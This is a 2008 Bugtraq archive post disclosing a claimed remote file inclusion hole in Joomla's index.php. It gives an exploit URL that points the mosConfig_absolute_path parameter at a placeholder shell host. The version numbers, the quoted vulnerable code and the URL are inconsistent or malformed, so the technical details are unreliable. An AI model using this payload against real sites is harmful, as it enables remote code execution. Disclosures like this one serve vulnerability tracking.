Bugtraq mailing list archives

Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit

From: alex_zooz_zooz () hotmail com
Date: 8 Feb 2008 15:49:42 -0000

#==============================================================================================
#Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit
#===============================================================================================
#                                                                         
#Critical Level : Dangerous                                               
#                                                                         
#        
#                                                                         
#Version : v2.3.1 & v2.3.0                                               
#                                                           
#================================================================================================
#Bug in : Index.php
#
#Vlu Code :
#--------------------------------
#     include_once($config['path_src_include'] . "common.inc.php");
#   
#
#================================================================================================
#
#Exploit :include( $mosConfig_absolute_path .'/offlinebar.php'
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?mosConfig_absolute_path=http//www.shellurl.com.com
#
#
#================================================================================================
#Discoverd By :  Fegla
#
#Conatact : alex_zooz_zooz[at]hotmail.com
#
#GreetZ :  Sub-Code   ,ShikaA  , Wizard CC

==================================================================================================

Current thread:

Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit alex_zooz_zooz (Feb 08)